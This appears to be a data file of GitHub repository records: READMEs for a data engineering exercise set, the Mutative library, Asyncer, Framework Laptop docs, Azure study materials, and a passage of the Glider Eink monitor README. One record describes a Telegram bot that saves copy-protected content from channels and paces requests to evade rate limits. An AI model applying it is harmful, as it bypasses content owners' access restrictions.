danielbeach/data-engineering-practice;Data Engineering Practice Problems One of the main obstacles of Data Engineering is the large and varied technical skills that can be required on a day-to-day basis. *** Note - If you email a link to your GitHub repo with all the completed exercises, I will send you back a free copy of my ebook Introduction to Data Engineering. *** This aim of this repository is to help you develop and learn those skills. Generally, here are the high level topics that these practice problems will cover. Python data processing. csv, flat-file, parquet, json, etc. SQL database table design. Python + Postgres, data ingestion and retrieval. PySpark Data cleansing / dirty data. How to work on the problems. You will need two things to work effectively on most all of these problems. - Docker - docker-compose All the tools and technologies you need will be packaged into the dockerfile for each exercise. For each exercise you will need to cd into that folder and run the docker build command, that command will be listed in the README for each exercise, follow those instructions. Beginner Exercises Exercise 1 - Downloading files. The first exercise tests your ability to download a number of files from an HTTP source and unzip them, storing them locally with Python . cd Exercises/Exercise-1 and see README in that location for instructions. Exercise 2 - Web Scraping + Downloading + Pandas The second exercise tests your ability perform web scraping, build uris, download files, and use Pandas to do some simple cumulative actions. cd Exercises/Exercise-2 and see README in that location for instructions. Exercise 3 - Boto3 AWS + s3 + Python. The third exercise tests a few skills. This time we will be using a popular aws package called boto3 to try to perform a multi-step actions to download some open source s3 data files. cd Exercises/Exercise-3 and see README in that location for instructions. Exercise 4 - Convert JSON to CSV + Ragged Directories. The fourth exercise focuses more file types json and csv , and working with them in Python . You will have to traverse a ragged directory structure, finding any json files and converting them to csv . Exercise 5 - Data Modeling for Postgres + Python. The fifth exercise is going to be a little different than the rest. In this problem you will be given a number of csv files. You must create a data model / schema to hold these data sets, including indexes, then create all the tables inside Postgres by connecting to the database with Python . Intermediate Exercises Exercise 6 - Ingestion and Aggregation with PySpark. The sixth exercise Is going to step it up a little and move onto more popular tools. In this exercise we are going to load some files using PySpark and then be asked to do some basic aggregation. Best of luck! Exercise 7 - Using Various PySpark Functions The seventh exercise Taking a page out of the previous exercise, this one is focus on using a few of the more common build in PySpark functions pyspark.sql.functions and applying their usage to real-life problems. Many times to solve simple problems we have to find and use multiple functions available from libraries. This will test your ability to do that. Exercise 8 - Using DuckDB for Analytics and Transforms. The eighth exercise Using new tools is imperative to growing as a Data Engineer. DuckDB is one of those new tools. In this exercise you will have to complete a number of analytical and transformation tasks using DuckDB. This will require an understanding of the functions and documenation of DuckDB. Exercise 9 - Using Polars lazy computation. The ninth exercise Polars is a new Rust based tool with a wonderful Python package that has taken Data Engineering by storm. It's better than Pandas because it has both SQL Context and supports Lazy evalutation for larger than memory data sets! Show your Lazy skills!;Data Engineering Practice Problems;[]
danielbeach/data-engineering-practice
unadlib/mutative;Mutative Mutative - A JavaScript library for efficient immutable updates, 2-6x faster than naive handcrafted reducer, and more than 10x faster than Immer. Why is Mutative faster than the spread operation(naive handcrafted reducer)? The spread operation has performance pitfalls, which can be detailed in the following article: The reduce ({...spread}) anti-pattern How slow is the Spread operator in JavaScript? And Mutative optimization focus on shallow copy optimization, more complete lazy drafts, finalization process optimization, and more. Motivation Writing immutable updates by hand is usually difficult, prone to errors, and cumbersome. Immer helps us write simpler immutable updates with "mutative" logic. But its performance issue causes a runtime performance overhead. Immer must have auto-freeze enabled by default(Performance will be worse if auto-freeze is disabled), such immutable state with Immer is not common. In scenarios such as cross-processing, remote data transfer, etc., we have to constantly freeze these immutable data. There are more parts that could be improved, such as better type inference, non-intrusive markup, support for more types of immutability, Safer immutability, more edge cases , and so on. This is why Mutative was created. Mutative vs Naive Handcrafted Reducer Performance Mutative vs Reducer benchmark by object: - Naive handcrafted reducer ```ts // baseState type: Record const state = { ...baseState, key0: { ...baseState.key0, value: i, }, }; ``` - Mutative ```ts const state = create(baseState, (draft) => { draft.key0.value = i; }); ``` ![Mutative vs Reducer benchmark by object](benchmark-object.jpg) > Measure(seconds) to update the 1K-100K items object, lower is better([view source](https://github.com/unadlib/mutative/blob/main/test/performance/benchmark-object.ts)). Mutative is up to 2x faster than naive handcrafted reducer for updating immutable objects. Mutative vs Reducer benchmark by array: - Naive handcrafted reducer ```ts // baseState type: { value: number }[] // slower 6x than Mutative const state = [ { ...baseState[0], value: i }, ...baseState.slice(1, baseState.length), ]; // slower 2.5x than Mutative // const state = baseState.map((item, index) => // index === 0 ? { ...item, value: i } : item // ); // same performance as Mutative // const state = [...baseState]; // state[0] = { ...baseState[0], value: i }; ``` > The actual difference depends on which spread operation syntax you use. - Mutative ```ts const state = create(baseState, (draft) => { draft[0].value = i; }); ``` ![Mutative vs Reducer benchmark by array](benchmark-array.jpg) > Measure(seconds) to update the 1K-100K items array, lower is better([view source](https://github.com/unadlib/mutative/blob/main/test/performance/benchmark-array.ts)). Mutative is up to 6x faster than naive handcrafted reducer for updating immutable arrays. Mutative vs Immer Performance Mutative passed all of Immer's test cases. Measure(ops/sec) to update 50K arrays and 1K objects, bigger is better( view source ). [Mutative v1.0.5 vs Immer v10.1.1] ``` Naive handcrafted reducer - No Freeze x 4,442 ops/sec ±0.38% (95 runs sampled) Mutative - No Freeze x 6,199 ops/sec ±0.79% (89 runs sampled) Immer - No Freeze x 5.30 ops/sec ±0.38% (18 runs sampled) Mutative - Freeze x 974 ops/sec ±1.77% (92 runs sampled) Immer - Freeze x 376 ops/sec ±0.67% (92 runs sampled) Mutative - Patches and No Freeze x 969 ops/sec ±0.99% (97 runs sampled) Immer - Patches and No Freeze x 5.27 ops/sec ±0.36% (18 runs sampled) Mutative - Patches and Freeze x 514 ops/sec ±0.97% (95 runs sampled) Immer - Patches and Freeze x 275 ops/sec ±0.74% (89 runs sampled) The fastest method is Mutative - No Freeze ``` Run yarn benchmark to measure performance. OS: macOS 14.2.1, CPU: Apple M1 Max, Node.js: v20.11.0 Immer relies on auto-freeze to be enabled, if auto-freeze is disabled, Immer will have a huge performance drop and Mutative will have a huge performance lead, especially with large data structures it will have a performance lead of more than 50x. So if you are using Immer, you will have to enable auto-freeze for performance. Mutative is disabled auto-freeze by default. With the default configuration of both, we can see the 16x performance gap between Mutative ( 6,199 ops/sec ) and Immer ( 376 ops/sec ). Overall, Mutative has a huge performance lead over Immer in more performance testing scenarios . Run yarn performance to get all the performance results locally. More Performance Testing Scenarios, Mutative is up to `2.5X-73.8X` faster than Immer: ![Mutative vs Immer - All benchmark results by average multiplier](test/benchmark/results/all.jpg) > [view source](https://github.com/unadlib/mutative/blob/main/test/benchmark). Features and Benefits Mutation makes immutable updates - Immutable data structures supporting objects, arrays, Sets and Maps. High performance - 10x faster than immer by default, even faster than naive handcrafted reducer. Optional freezing state - No freezing of immutable data by default. Support for JSON Patch - Full compliance with JSON Patch specification. Custom shallow copy - Support for more types of immutable data. Support mark for immutable and mutable data - Allows for non-invasive marking. Safer mutable data access in strict mode - It brings more secure immutable updates. Support for reducer - Support reducer function and any other immutable state library. Difference between Mutative and Immer | | Mutative | Immer | | :------------------------------------ | -------: | :---: | | Custom shallow copy | ✅ | ❌ | | Strict mode | ✅ | ❌ | | No data freeze by default | ✅ | ❌ | | Non-invasive marking | ✅ | ❌ | | Complete freeze data | ✅ | ❌ | | Non-global config | ✅ | ❌ | | async draft function | ✅ | ❌ | | Fully compatible with JSON Patch spec | ✅ | ❌ | Mutative has fewer bugs such as accidental draft escapes than Immer, view details . Installation Yarn sh yarn add mutative NPM sh npm install mutative CDN Unpkg: <script src="https://unpkg.com/mutative"></script> JSDelivr: <script src="https://cdn.jsdelivr.net/npm/mutative"></script> Usage ```ts import { create } from 'mutative'; const baseState = { foo: 'bar', list: [{ text: 'coding' }], }; const state = create(baseState, (draft) => { draft.list.push({ text: 'learning' }); }); expect(state).not.toBe(baseState); expect(state.list).not.toBe(baseState.list); ``` create(baseState, (draft) => void, options?: Options): newState The first argument of create() is the base state. Mutative drafts it and passes it to the arguments of the draft function, and performs the draft mutation until the draft function finishes, then Mutative will finalize it and produce the new state. Use create() for more advanced features by setting options . APIs create() apply() current() original() unsafe() isDraft() isDraftable() rawReturn() makeCreator() markSimpleObject() create() Use create() for draft mutation to get a new state, which also supports currying. ```ts import { create } from 'mutative'; const baseState = { foo: 'bar', list: [{ text: 'todo' }], }; const state = create(baseState, (draft) => { draft.foo = 'foobar'; draft.list.push({ text: 'learning' }); }); ``` In this basic example, the changes to the draft are 'mutative' within the draft callback, and create() is finally executed with a new immutable state. create(state, fn, options) Then options is optional. strict - boolean , the default is false. Forbid accessing non-draftable values in strict mode(unless using unsafe() ). When strict mode is enabled, mutable data can only be accessed using unsafe() . It is recommended to enable strict in development mode and disable strict in production mode. This will ensure safe explicit returns and also keep good performance in the production build. If the value that does not mix any current draft or is undefined is returned, then use rawReturn() . enablePatches - boolean | { pathAsArray?: boolean; arrayLengthAssignment?: boolean; } , the default is false. Enable patch, and return the patches/inversePatches. If you need to set the shape of the generated patch in more detail, then you can set pathAsArray and arrayLengthAssignment 。 pathAsArray default value is true , if it's true , the path will be an array, otherwise it is a string; arrayLengthAssignment default value is true , if it's true , the array length will be included in the patches, otherwise no include array length( NOTE : If arrayLengthAssignment is false , it is fully compatible with JSON Patch spec, but it may have additional performance loss), view related discussions . enableAutoFreeze - boolean , the default is false. Enable autoFreeze, and return frozen state, and enable circular reference checking only in development mode. mark - (target) => ('mutable'|'immutable'|function) | (target) => ('mutable'|'immutable'|function)[] Set a mark to determine if the value is mutable or if an instance is an immutable, and it can also return a shallow copy function( AutoFreeze and Patches should both be disabled, Some patches operation might not be equivalent). When the mark function is (target) => 'immutable', it means all the objects in the state structure are immutable. In this specific case, you can totally turn on AutoFreeze and Patches . mark supports multiple marks, and the marks are executed in order, and the first mark that returns a value will be used. When a object tree node is marked by the mark function as mutable , all of its child nodes will also not be drafted by Mutative and will retain their original values. create() - Currying create draft ts const [draft, finalize] = create(baseState); draft.foobar.bar = 'baz'; const state = finalize(); Support set options such as const [draft, finalize] = create(baseState, { enableAutoFreeze: true }); create producer ts const produce = create((draft) => { draft.foobar.bar = 'baz'; }); const state = produce(baseState); Also support set options such as const produce = create((draft) => {}, { enableAutoFreeze: true }); apply() Use apply() for applying patches to get the new state. ```ts import { create, apply } from 'mutative'; const baseState = { foo: 'bar', list: [{ text: 'todo' }], }; const [state, patches, inversePatches] = create( baseState, (draft) => { draft.foo = 'foobar'; draft.list.push({ text: 'learning' }); }, { enablePatches: true, } ); const nextState = apply(baseState, patches); expect(nextState).toEqual(state); const prevState = apply(state, inversePatches); expect(prevState).toEqual(baseState); ``` current() Get the current value from a draft. For any draft where a child node has been modified, the state obtained by executing current() each time will be a new reference object. For a draft where no child nodes have been modified, executing current() will always return the original state. It is recommended to minimize the number of times current() is executed when performing read-only operations, ideally executing it only once. ts const state = create({ a: { b: { c: 1 } }, d: { f: 1 } }, (draft) => { draft.a.b.c = 2; expect(current(draft.a)).toEqual({ b: { c: 2 } }); // The node `a` has been modified. expect(current(draft.a) === current(draft.a)).toBeFalsy(); // The node `d` has not been modified. expect(current(draft.d) === current(draft.d)).toBeTruthy(); }); original() Get the original value from a draft. ```ts const baseState = { foo: 'bar', list: [{ text: 'todo' }], }; const state = create(baseState, (draft) => { draft.foo = 'foobar'; draft.list.push({ text: 'learning' }); expect(original(draft.list)).toEqual([{ text: 'todo' }]); }); ``` unsafe() When strict mode is enabled, mutable data can only be accessed using unsafe() . ```ts const baseState = { list: [], date: new Date(), }; const state = create( baseState, (draft) => { unsafe(() => { draft.date.setFullYear(2000); }); // or return the mutable data: // const date = unsafe(() => draft.date); }, { strict: true, } ); ``` isDraft() Check if a value is a draft. ```ts const baseState = { date: new Date(), list: [{ text: 'todo' }], }; const state = create(baseState, (draft) => { expect(isDraft(draft.date)).toBeFalsy(); expect(isDraft(draft.list)).toBeTruthy(); }); ``` isDraftable() Check if a value is draftable ```ts const baseState = { date: new Date(), list: [{ text: 'todo' }], }; expect(isDraftable(baseState.date)).toBeFalsy(); expect(isDraftable(baseState.list)).toBeTruthy(); ``` You can set a mark to determine if the value is draftable, and the mark function should be the same as passing in create() mark option. rawReturn() For return values that do not contain any drafts, you can use rawReturn() to wrap this return value to improve performance. It ensure that the return value is only returned explicitly. ts const baseState = { id: 'test' }; const state = create(baseState as { id: string } | undefined, (draft) => { return rawReturn(undefined); }); expect(state).toBe(undefined); If the return value mixes drafts, you should not use rawReturn() . ts const baseState = { a: 1, b: { c: 1 } }; const state = create(baseState, (draft) => { if (draft.b.c === 1) { return { ...draft, a: 2, }; } }); expect(state).toEqual({ a: 2, b: { c: 1 } }); expect(isDraft(state.b)).toBeFalsy(); If you use rawReturn() , we recommend that you enable strict mode in development. ts const baseState = { a: 1, b: { c: 1 } }; const state = create( baseState, (draft) => { if (draft.b.c === 1) { return rawReturn({ ...draft, a: 2, }); } }, { strict: true, } ); // it will warn `The return value contains drafts, please don't use 'rawReturn()' to wrap the return value.` in strict mode. expect(state).toEqual({ a: 2, b: { c: 1 } }); expect(isDraft(state.b)).toBeFalsy(); makeCreator() makeCreator() only takes options as the first argument, resulting in a custom create() function. ```ts const baseState = { foo: { bar: 'str', }, }; const create = makeCreator({ enablePatches: true, }); const [state, patches, inversePatches] = create(baseState, (draft) => { draft.foo.bar = 'new str'; }); ``` markSimpleObject() markSimpleObject() is a mark function that marks all objects as immutable. ```ts const baseState = { foo: { bar: 'str', }, simpleObject: Object.create(null), }; const state = create( baseState, (draft) => { draft.foo.bar = 'new str'; draft.simpleObject.a = 'a'; }, { mark: markSimpleObject, } ); expect(state.simpleObject).not.toBe(baseState.simpleObject); ``` View more API docs . Using TypeScript castDraft() castImmutable() Draft<T> Immutable<T> Patches Patch Options<O, F> Integration with React use-mutative - A 2-6x faster alternative to useState with spread operation use-travel - A React hook for state time travel with undo, redo, reset and archive functionalities. FAQs I'm already using Immer, can I migrate smoothly to Mutative? Yes. Unless you have to be compatible with Internet Explorer, Mutative supports almost all of Immer features, and you can easily migrate from Immer to Mutative. Migration is also not possible for React Native that does not support Proxy. React Native uses a new JS engine during refactoring - Hermes, and it (if < v0.59 or when using the Hermes engine on React Native < v0.64) does not support Proxy on Android , but React Native v0.64 with the Hermes engine support Proxy . Can Mutative be integrated with Redux? Yes. Mutative supports return values for reducer, and redux-toolkit is considering support for configurable produce() . Migration from Immer to Mutative mutative-compat - Mutative wrapper with full Immer API compatibility, you can use it to quickly migrate from Immer to Mutative. produce() -> create() Mutative auto freezing option is disabled by default, Immer auto freezing option is enabled by default (if disabled, Immer performance will have a more huge drop). You need to check if auto freezing has any impact on your project. If it depends on auto freezing, you can enable it yourself in Mutative. ```ts import produce from 'immer'; const nextState = produce(baseState, (draft) => { draft[1].done = true; draft.push({ title: 'something' }); }); ``` Use Mutative ```ts import { create } from 'mutative'; const nextState = create(baseState, (draft) => { draft[1].done = true; draft.push({ title: 'something' }); }); ``` Patches ```ts import { produceWithPatches, applyPatches } from 'immer'; enablePatches(); const baseState = { age: 33, }; const [nextState, patches, inversePatches] = produceWithPatches( baseState, (draft) => { draft.age++; } ); const state = applyPatches(nextState, inversePatches); expect(state).toEqual(baseState); ``` Use Mutative ```ts import { create, apply } from 'mutative'; const baseState = { age: 33, }; const [nextState, patches, inversePatches] = create( baseState, (draft) => { draft.age++; }, { enablePatches: true, } ); const state = apply(nextState, inversePatches); expect(state).toEqual(baseState); ``` Return undefined ```ts import produce, { nothing } from 'immer'; const nextState = produce(baseState, (draft) => { return nothing; }); ``` Use Mutative ```ts import { create, rawReturn } from 'mutative'; const nextState = create(baseState, (draft) => { return rawReturn(undefined); }); ``` Contributing Mutative goal is to provide efficient and immutable updates. The focus is on performance improvements and providing better APIs for better development experiences. We are still working on it and welcome PRs that may help Mutative. Development Workflow: Clone Mutative repo. Run yarn install to install all the dependencies. Run yarn prettier to format the code. yarn test --watch runs an interactive test watcher. Run yarn commit to make a git commit. License Mutative is MIT licensed .;Efficient immutable updates, 2-6x faster than naive handcrafted reducer, and more than 10x faster than Immer.;immer,immutability,immutable,reducer,redux,mutable,mutation,state-management,mutative,react
unadlib/mutative
vasusen-code/SaveRestrictedContentBot;Save restricted content Bot Contact: Telegram A stable telegram bot to get restricted messages with custom thumbnail support , made by Mahesh Chauhan. works for both public and private chats Custom thumbnail support for Pvt medias supports text and webpage media messages Faster speed Forcesubscribe available To save from bots send link in this format : t.me/b/bot_username/message_id (use plus messenger for message_id) /batch - (For owner only) Use this command to save upto 100 files from a pvt or public restricted channel at once. /cancel - Use this to stop batch Time delay is added to avoid FloodWait and keep user account safe. Variables API_ID API_HASH SESSION BOT_TOKEN AUTH - Owner user id FORCESUB - Public channel username without '@'. Don't forget to add bot in channel as administrator. Get API & PYROGRAM string session from: API: API scrapper Bot or Telegram.org PYROGRAM SESSION: SessionGen Bot or BOT TOKEN: @Botfather on telegram Deploy Deploy on VPS Easy Method: Intall docker-compose Fill in the variables in docker-compose.yml file using your favorite text editor or nano Start the container sudo apt install docker-compose -y nano docker-compose.yml sudo docker-compose up --build The hard Way: Fill vars in your fork in this file as shown in this picture enter all the below commands sudo apt update sudo apt install ffmpeg git python3-pip git clone your_repo_link cd saverestrictedcontentbot pip3 install -r requirements.txt python3 -m main if you want bot to be running in background then enter screen -S srcb before python3 -m main after python3 -m main , click ctrl+A, ctrl+D if you want to stop bot, then enter screen -r srcb and to kill screen enter screen -S srcb -X quit . Deploy your bot on Render Tutorial - Click here Deploy your bot on heroku » Method - 1: - Star the repo, and fork it in desktop mode - Go to settings of your forked repo - Rename your repo by any other name - Click on » Method - 2: - Star the repo, and fork it in desktop mode - create app in heroku - go to settings of app›› config vars›› add all variables - add buildpacks - connect to github and deploy - turn on dynos Buildpacks for manual deploy: heroku/python https://github.com/jonathanong/heroku-buildpack-ffmpeg-latest.git Deploy your bot on Okteto [Useless] Tutorial for okteto - click here;Stable telegram bot to save Restricted content with custom thumbnail support.;telegram,bot,telegram-bot,save,restricted,content,forward,clone
vasusen-code/SaveRestrictedContentBot
FrameworkComputer/Framework-Laptop-13;Framework Laptop 13 Documentation for the Mainboard and other key modules in the Framework Laptop 13 (available at https://frame.work/marketplace/mainboards). We designed the Mainboard from the start as a standalone module to make upgrades easy in the Framework Laptop and to also work great as a high-performance single board computer using Intel’s 11th Gen Intel Core, 12th Gen Intel Core, and 13th Gen Intel Core processors along with AMD's Ryzen 7040 Series processors. All you need to do is insert memory, plug in a USB-C power adapter, and hit the tiny power button on-board, and you’ve got a powered-up computer. You can also pick up parts like a Bottom Cover Kit, Input Cover Kit, or Battery from the Marketplace to extend your setup with. See more on this at https://frame.work/blog/mainboard-availability-and-open-source-release. We want to make it as easy as possible to build new projects and products that use the Mainboard, so this repository contains 2D and 3D CAD as well as electrical documentation to help you get started. License Framework Laptop 13 © 2022 by Framework Computer Inc is licensed under CC BY 4.0. To view a copy of this license, visit http://creativecommons.org/licenses/by/4.0/ 3D CAD (in the base directory) External 3D CAD of the system and main modules to enable development of 3D-printed replacement parts, skins, cases, and other accessories. We're excited to see what you do with it! Mainboard This contains 2D drawings of the Mainboard along with a couple of example 3D-printable cases. Both of these are easy to print on home 3D printers. Since these are open source, you are free to modify, remix, and redistribute them however you’d like to. It also contains the pinouts and part numbers of the connectors on the Mainboard. All of this is a starting point for a broader set of open source Mainboard documentation to enable creation of fully compatible third-party Mainboards in the future. Battery 2D drawings, 3D CAD, and the pinout of the Battery to enable re-use. Display 2D drawings, 3D CAD, and the pinout of the Display to enable re-use. Fingerprint Reader Pinout of the Fingerprint Reader. Touchpad Pinout of the Touchpad connectors. Webcam Pinout of the Webcam.;Documentation for the Mainboard and other modules in the Framework Laptop 13;framework,frameworklaptop
FrameworkComputer/Framework-Laptop-13
tiangolo/asyncer;Asyncer, async and await, focused on developer experience. Documentation : https://asyncer.tiangolo.com Source Code : https://github.com/tiangolo/asyncer Asyncer is a small library built on top of AnyIO . Asyncer has a small number of utility functions that allow working with async , await , and concurrent code in a more convenient way under my ( @tiangolo - Sebastián Ramírez ) very opinionated and subjective point of view. The main goal of Asyncer is to improve developer experience by providing better support for autocompletion and inline errors in the editor, and more certainty that the code is bug-free by providing better support for type checking tools like mypy . Asyncer also tries to improve convenience and simplicity when working with async code mixed with regular blocking code , allowing to use them together in a simpler way... again, under my very subjective point of view. 🚨 Warning This small library only exists to be able to use these utility functions until (and if) they are integrated into AnyIO . It will probably take some time for that to happen (or to be decided if it will be included or not). So I made this to be able to use these ideas right now. 🤓 Can I Use It? Yes 🎉 (but continue reading). You can use this and evaluate the library API design I'm proposing. It will probably be useful to know if it works and is useful for you (I hope so). But still, consider this lab material, expect it to change a bit. 🧪 If you use it, pin the exact Asyncer version for your project, to make sure it all works. Have tests for your project (as you should, anyway). And upgrade the version once you know that the new version continues to work correctly. Still, it's just 4 functions , so there's not much to change, if you had to refactor your code to update something it would not be much. And if you don't want to add asyncer as a dependency to your project, you can also just copy the main file and try out those functions, it's quite small (but in that case you won't get updates easily). Requirements As Asyncer is based on AnyIO it will be also installed automatically when you install Asyncer . Installation ```console $ pip install asyncer ---> 100% Successfully installed asyncer anyio ``` How to Use You can read more about each of the use cases and utility functions in Asyncer in the tutorial . As a sneak preview of one of the utilities, you can call sync code from async code using asyncify() : ```Python import time import anyio from asyncer import asyncify def do_sync_work(name: str): time.sleep(1) return f"Hello, {name}" async def main(): message = await asyncify(do_sync_work)(name="World") print(message) anyio.run(main) ``` Asyncer 's asyncify() will use AnyIO underneath to do the smart thing , avoid blocking the main async event loop, and run the sync /blocking function in a worker thread . Editor Support Everything in Asyncer is designed to get the best developer experience possible, with the best editor support. Autocompletion for function arguments: Autocompletion for return values: Inline errors in editor: Support for tools like mypy , that can help you verify that your code is correct , and prevent many bugs. License This project is licensed under the terms of the MIT license .;Asyncer, async and await, focused on developer experience.;python,async,asyncio,trio,anyio
tiangolo/asyncer
johnthebrit/CertificationMaterials;Certification Materials A collection of materials related to my certification videos hosted on YouTube. https://onboardtoazure.com (https://youtube.com/ntfaqguy) Please subscribe and support my channel. Thank you. I have a recommended full path with other useful links and materials at https://learn.onboardtoazure.com. This includes my content, links to Microsoft materials, exam sandbox environment links and more. Video and Whiteboard Index Getting started learning Azure introduction video - https://youtu.be/V1Hk45XD6Qw | Video/Playlist | Artifact | |--|--| | AZ-900 Full Course | AZ-900 Course Handout | | AZ-900 Study Cram | AZ-900 Study Cram Whiteboard | | AI-900 Study Cram | AI-900 Study Cram Whiteboard | | DP-900 Study Cram | DP-900 Study Cram Whiteboard | | MS-900 Study Cram | MS-900 Study Cram Whiteboard | | PL-900 Study Cram | PL-900 Study Cram Whiteboard | | SC-900 Study Cram | SC-900 Study Cram Whiteboard | | AZ-104 Study Playlist | | | AZ-104 Study Cram | AZ-104 Study Cram Whiteboard | | SC-100 Study Playlist | | | SC-100 Study Cram | SC-100 Study Cram Whiteboard | | SC-300 Study Playlist | | | SC-300 Study Cram | SC-300 Study Cram Whiteboard | | AZ-500 Study Playlist | | | AZ-500 Study Cram | AZ-500 Study Cram Whiteboard | | AZ-700 Study Playlist | | | AZ-700 Study Cram | AZ-700 Study Cram Whiteboard | | AZ-305 Study Playlist | | | AZ-305 Study Cram | AZ-305 Study Cram Whiteboard | | AZ-400 DevOps Master Class | DevOps Master Class Materials Repo | Certification renewal experience video - https://youtu.be/L9luTi9LyXU;A collection of materials related to my certification videos;[]
johnthebrit/CertificationMaterials
Modos-Labs/Glider;Glider Open-source Eink monitor with an emphasis on low latency. Note: This repo only contains the hardware design, the gateware running on the FPGA is my open-source Caster EPDC design. This README also contains information about the Caster as well. This is a long document, containing not just information about this project, but also pretty much everything I know about Eink. Given it's a bit hard to gather information about Eink online, I think this is the right thing to do. Use the following table of contents to navigate around. Eink is a registered trademark and brand of E Ink Corporation. All the contents provided in this repo are based on publicly available information online and original research. They are not endorsed by Eink in any way and they may contain errors and/ or inaccuracies. If you're interested in attaining a board, or the reference monitor, see and subscribe to the pre-launch page for the Modos Paper Monitor on Crowd Supply for updates. If you are interested in Eink or any other display technologies, I have a Discord server for that. Feel free to join: https://discord.gg/rtT7euSHQS . (This Discord server is also not endorsed by Eink or any other company. It's not a customer support server.) Table of Contents Overview Features Hardware Components Eink Screens Basic Theory of Operation Advantages and Disadvantages The Role of Eink Controller Screen Panel Types Using Screen with Integrated Controller Using Screen without Integrated Controller Understanding Waveform Greyscale Display Color Display Dithering Eink Screen Generations Caster/ Glider Design Low Latency Drive Hybrid Greyscale Mode Limitations Hardware Design Decisions Gateware Architecture Firmware Functions Resources Utilization Building PCB FPGA Bitstream MCU Firmware Working with Waveforms Compatible Screens References License Appendix Using Screens without Datasheet Screen List Overview Features Complete solution for low-latency/ high-refresh-rate EPD monitor Supports electrophoretic display panels with parallel I/F (Eink(R), SiPix and DES) Supports both monochrome and color-filter-array (such as Kaleido(TM)) based color screen Extremely low processing delay of \<20 us Supports binary, 4-level grayscale, and 16-level grayscale output modes Latency-optimized binary and 4-level grayscale driving modes Hybrid automatic binary and 16-level grayscale driving mode Host software runtime controllable regional update and mode switching Hardware bayer dithering, blue-noise dithering, and error-diffusion dithering with no additional latency Controller natively supports FPD-Link (LVDS), DVI (TMDS), and MIPI-DSI input Board-level design supports USB-C (USB Type-C DisplayPort Alt Mode) and DVI input Hardware Xilinx(R) Spartan-6 LX16 FPGA running Caster DDR3-800 framebuffer memory Type-C DisplayPort Alt-Mode video input with onboard PTN3460 DP-LVDS bridge or DVI (via microHDMI connector) video input with onboard ADV7611 decoder Epaper power supply with up to 1A peak current on +/-15V rail supporting large panels VCOM kick-back voltage measurement support On-board RaspberryPi(R) RP2040 microcontroller for USB communication and firmware upgrade Up to 133MP/s processing rate with dithering enabled, >200MP/s when disabled The board is designed with KiCad. You may need the latest stable version of KiCad to open the source file. Components This repo hosts the PCB design, firmware source code, and a reference 3D-printable case design. The RTL code is in a separate repo: https://gitlab.com/zephray/Caster/ . Eink Screens Eink is the brand of a family of paper-like electrophoretic displays. The underlying technology is invented in the MIT Media Lab between 1995 and 1997 by Barrett Comiskey, J.D. Albert, and Joseph Jacobson. They later founded the E Ink Corporation to commercialize this technology. Nowadays they are commonly used on e-readers and electronic shelf labels. You’ve probably seen them on Kindle, in stores, or maybe in some train stations as well. | eReader/ Tablets | Electronic Shelf Label | Digital Signage | |-|-|-| | | | | (Source: https://www.eink.com/application, image copyright Eink corporation) This section gives an overview of the electrophoretic displays, including the screen panels available and underlying technology. Note this project doesn't and can't support all electrophoretic screens. This documentation also solely focuses on using existing off-the-shelf screen panels rather than the physics or manufacturing process of one. Basic Theory of Operation In the simplest form, you have charged particles with different colors, dispersed in some oil in some transparent container. By applying electric fields the particles can be moved up or down to produce either black or white, or a mixture of that. (Source: https://www.eink.com/tech/detail/How_it_works , copyright Eink Corporation) There are multiple technologies based on this basic concept, namely Eink’s micro-capsule display, SiPix (now acquired by Eink)’s micro-cup display, and WFT’s DES display. They differ in specific ways of confining the particles in containers, but otherwise very similar. The pixels on the screen are typically arranged as a 2D array, driven with TFTs. The pixels are scanned/ driven periodically at a fixed refresh rate, typically ranging from 50Hz to 120Hz. Applying positive voltage on the pixel will typically drive the particles toward the white state while applying negative voltage will drive the particles towards the black state. This is similar to active matrix TN/IPS LCDs, which also use 2D TFT arrays and electrical fields for changing state. However, unlike LCDs, EPDs maintain their state after the electrical field is removed. So unlike LCDs which require continuous refreshing, the EPDs only need to be refreshed till the pixels are fully driven. In terms of driving the screen panel, depending on the pixel value (1 or 0), each pixel would be driven either with a positive voltage or a negative voltage. A global counter can be used to count the frames elapsed and stop driving the pixels after a predefined period of time (for example, 100ms). Two framebuffers are typically used for determining if the pixel has changed color or not. If not, then the pixel does not need to be driven. Advantages and Disadvantages In terms of display quality, EPDs are no match for modern IPS LCDs. The following is a comparison table of key parameters. The specific number would vary depending on the screen used but should be within the same ballpark. | | Monochrome EPD | CFA-based Color EPD | Transmissive TFT IPS LCD | Reflective TFT TN LCD | |-|-|-|-|-| | Contrast Ratio | ~17:1 | ~14:1 | ~1000:1 | ~14:1 | | Colors | 16 (Greyscale) | 4096 | 16M | 256 | | Color Gamut | N/A | ~1.5% sRGB | ~99.9% sRGB | N/A | | Reflectivity | ~45% | ~25% | N/A | ~15% | | Response Time | ~150ms | ~150ms | ~10ms | ~15ms | It has a few advantages. It reflects lights instead of emitting lights, so it generally consumes less power and can be used outdoors, etc. It’s also bistable, which means that it retains the image after the power has been removed. Personally, the biggest differentiating factor for me (author of this README) is that it looks like paper. The image above shows a comparison between reflective TFT LCD (SHARP memory LCD in this case) and Eink. The LCD has a mirror-like texture which changes reflectivity drastically in different angles, while the Eink is more paper-like. | ZBD LCD | Ch LCD | STN LCD | |-|-|-| | | | | | Bistable, reflective, high contrast, no greyscale, ~10s refresh | Bistable, reflective, lower contrast, up to 32 level greyscale, ~5s refresh | Volatile, reflective, lower contrast, up to 32 level greyscale, ~100ms response | There are many other reflective or bistable display technologies. They are all interesting displays on their own, but none of them feels like paper (yet). Overall, there is no single perfect display technology. Each has its own unique strength. Pick the right one for your project. The Role of Eink Controller The Eink controller is in some ways similar to the display controller (DC/ CRTC) + timing controller (TCON) in a typical LCD-based system. It takes the raw image data and converts it to signals required to drive the screen. To understand the actual work of an eink controller, start from the basic concept. The color of a pixel can be changed by applying positive or negative voltage for a finite period of time. From the controller’s perspective, depending on the current state of the pixel and the desired state of the pixel, there are 4 possibilities. | Current State | Target State | Action | |-|-|-| | Black | Black | No operation | | Black | White | Apply positive voltage | | White | Black | Apply negative voltage | | White | White | No operation | The controller needs to store and maintain the screen state inside of its own buffer memory, so it would typically have a large on-chip SRAM or an off-chip SDRAM controller. The controller should also have a timer to ensure the screen doesn't get overdriven or underdriven. The controller often uses the so-called " waveform " to replace the action column of the previous table. Instead of hardcoding the action for state transition, the actions are stored into a look-up-table (LUT) which can be modified at runtime to allow higher flexibility. Controllers may also offer more advanced features such as dithering acceleration, multiple region updates, automatic LUT selection, etc. Screen Panel Types As discussed in the previous section, an Eink screen needs to be coupled to an Eink controller to function. Aside from that, the screen also needs 